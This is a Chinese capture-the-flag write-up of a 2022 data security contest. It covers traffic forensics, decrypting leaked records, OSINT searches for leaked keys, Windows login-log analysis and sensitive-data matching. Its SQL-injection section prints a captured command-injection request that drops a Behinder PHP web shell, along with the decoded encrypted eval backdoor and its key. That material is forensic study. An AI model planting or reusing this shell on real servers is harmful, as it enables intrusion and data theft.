2022年10月25日,为期两日的数据安全大赛于i春秋平台线上举行,在王队长的领队下,团队三个屁民开始了有趣的解题之旅。
题目分为四个类型,分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。
时间有点短,再加上有里还有活要干,所以很多题也没有答完,这次由我代表大家给大家进行一个复盘
泄露溯源定位
这个其实是正式答题的第一题,理论题在这里就不赘述了。我们来看下题干和描述。
题干如下:
我们可以得知,此次泄密事件,泄密的主体其实是五个人的姓名、手机号信息,当然了还有其他的一些信息,不过那个是后面的题,我们先看第一题,通过公示的五条信息,而后回放pcap包来找到究竟是哪个账户泄密的。
我们如题,使用wireshark打开数据包就可以了,而后直接筛选mysql协议、检索关键字为 Roberto Qian,至于为什么不检索汉字,因为我嫌转化为十六进制麻烦
实际上符合检索的也没几个,很快我们就检索到了符合要求的数据包
tcp.stream eq 11
我们可以发现,上述的5个电话号码完全符合泄密的信息,那么就可以证明就是这个数据包有问题,并且也可以看到,当前数据库的用户为 dataUser3
第一题也就解答好了,我们接下来看第二题
去github直接搜索关键字就可以找到项目了,很简单,考的是信息收集能力
https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py
那么我们再看最后一道小题
这里说明,泄露的不仅仅是姓名、手机号,我们直接返回刚刚我们截取的流量包,流量包关键信息如下
def.ob.dcf_customer.dcf_customer.address.address.!.,.........+....1 ..........13345678879...................(....2........13573839493...................#....3.Roberto Qian.15877886543.Beijing*.. .4.Liu Xiao.13098887678......................
.5........18798766766.............."...$......select * from dcf_encryption_info.....B....def.ob.dcf_encryption_info.dcf_encryption_info.id.id.?.
....#B...F....def.ob.dcf_encryption_info.dcf_encryption_info.type.type.!...........D....def.ob.dcf_encryption_info.dcf_encryption_info.key.key.!...........
....1.Base64......2.MD5.
....3.SHA1.go321.....4.AES.aa01... .5.AES.sin30...
..."..."......select * from dcf_receive_info3.....>....def.ob.dcf_receive_info3.dcf_receive_info3.id.id.?.
....#B...N....def.ob.dcf_receive_info3.dcf_receive_info3
account_id
account_id.?...........B....def.ob.dcf_receive_info3.dcf_receive_info3.info.info.!...........a....1.10021XU2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==.....2.10024.U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+u....3.10022lU2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=u....4.11021lU2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=... .5.15021.U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrzu..
.6.15021lU2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=a....7.15021XU2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==a....8.11021XU2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==a..
.9.15022XU2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==b....10.16025XU2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==b....11.15028XU2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==b....12.15026XU2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52phIYEjxdX70aOG8ek8D55IPDYa7Bz05BmmFE89CVgMDIt1Y7zg==J....13.15771@U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4HhflJ....14.15231@U2FsdGVkX19PJjvCZ4dPBUzWF0A0ZrRQf5C7bYAbC2DUBEggsjIWflpsUkgeFQOKJ....15.15451@U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/onJ....16.15091@U2FsdGVkX19yVfbektz9sPOmf64arS54qTNOQI4qH1A0AGNPMtw1kGaJ2zMx7MDl......."........
我们可以发现,下面有16条加密流量,然后在上半部分有5个编码的提示,我们直接根据提示进行解密,发现其实使用的就是aes加密,秘钥就是aa01
解密后如下
http://www.jsons.cn/aesencrypt/
SQLpacket
第一题,我们可以发现,根据pcap包前面的操作都是sql注入的探测,直到后面进行了命令执行,根据检索,发现攻击者执行了ls命令,并且数据包出现了我们想要的东西
后来发现,可以直接检索关键字
tcp.stream eq 185
第二题,是寻找加密的东西,团队搞半天没找到,后来发现没找到的原因是人家就是base64加密然后转hex了,并没有使用冰蝎aes加密,这就很迷,也是困扰我们团队的一个问题,为什么请求体是aes+base64加密,单单这个返回包却是base64+hex编码???
我们通过翻垃圾,找到了冰蝎加密的过程
tcp.stream eq 187
加密主体为base64编码
/tmpbkxya.php?cmd=echo%20PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iMDVjMWNjOWMyZGVhZmI3NSI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJc2Vzc2lvbl93cml0ZV9jbG9zZSgpOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2B%20%7Cbase64%20-d%20%3E%20shell.php
解密如下:
<?php
@error_reporting(0);
session_start();
$key="05c1cc9c2deafb75";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
我们在这里获取到了加密的秘钥
$key="05c1cc9c2deafb75";
然后依然是翻垃圾,在某请求中我们发现了下载流量
tcp.stream eq 197
原始请求体:

解密后关键代码:
$mode="ZG93bmxvYWQ=";$mode=base64_decode($mode);$path="L3Zhci93d3cvaHRtbC9pbmNsdWRlcy9yZWFsX2RiLnBocA==";
再base64编码:
$mode="download";$mode=base64_decode($mode);$path="/var/www/html/includes/real_db.php";
我们查看返回,发现返回包并不能通过aes解密,而后直接使用base64编码转换,这里字数太多,贴不上去了,刚刚直接崩溃了,最难受的就是公众号崩了,csdn也崩了,而且只能预览不能修改不能转发了,气不气吧???
先进行base64编码
在进行16进制转换即可
第三题和第四题没做出来,直接出第五题了
这个地方我没解开,队友解开了
通过获取的shell.php的密钥 05c1cc9c2deafb75 利用脚本解密第203个分组包,获得一串base64编码的字符串
账号泄密追踪
第一个小题,是从github搜索
搜索green berry,定位源码类型为python的工程
翻阅文件,查找到key
第二小题,gitee
Gitee平台为国内平台,先尝试拼音
翻阅文件,检索key
第三小题
语雀为国内平台,优先检索拼音,限定时间半年内
第四小题
知乎搜索qingmei
第五小题
BlueTeam
第一题,题干给的是一些系统日志、监控的进程信息以及一个流量包
我们打开系统安全日志,通过检索4624/4625登录事件发现,ming用户的爆破时间点与登录事件点一一对应,可以确定,是ming用户异常
首先检索登录失败日志,将事件限制在6.27即可
我们不难发现,在21:21这个时间段内明显存在暴力破解现象,攻击者利用SMB协议进行暴力破解攻击,并且于21:21:32爆破最后一次并成功停止爆破
我们再查看对应的登录成功日志,发现ming用户的确是21:21:32登录成功
第二题没答上来,试了一下第一次登录成功的ip地址,也试了第一次攻击的ip地址,都失败了,也就没浪费太多时间
第三题
我们使用ProcessMonitor工具打开题干给的Logfile.PML文件
通过浏览进程信息,此处开始查询权限,判断在此时间点前进行了提权
向上找垃圾,发现疑似使用word文件进行提权(猜测缓冲区溢出漏洞)
往前翻发现下载了很多的文件helper.doc
最后这道题就这么写了,我也没找到为什么是这个文件进行溢出提权
第四题
非常规软件对各类办公文件进行检索,判断为最终提权后文件
第五小题
承上启下
sneakshot
下载好之后,是一张图片,并且是iphone14拍摄的
最后用了ps也没行,能看出来有个水印,于是乎回头用手机打开,调节参数信息,例如亮度、对比度、柔和度等,终于挑出来,能看了
敏感数据识别
我们先看题干
打开试题,是一个80+MB的txt文件,我们需要提取我们所需要的信息
此时我们除了写脚本,并没有太好的办法,这里以队长老王的脚本为例,为啥不用我的,因为我写的没人家写的规范
此处以python脚本为例
根据手机号、imei、银行卡限制要求,制定匹配list
IP匹配
邮箱匹配
手机号匹配
Imei匹配
银行卡号匹配
读取文件匹配即可,就不演示了
剩下的题也没来得及做,简单web题第一题只能做出来一半,就不写了;
第二题其实是github上的源码,通过更改setcookie即可达到越权的效果,但是并没做出来,菜是原罪
https://github.com/PanJiaChen/vue-element-admin/issues/587
其实还想做刮刮乐那道题的,但是最后实在是头疼,三个好兄弟一商量,在五点结束了继续做题的想法
还是有收获的
版权归原作者 vlan911 所有, 如有侵权,请联系我们删除。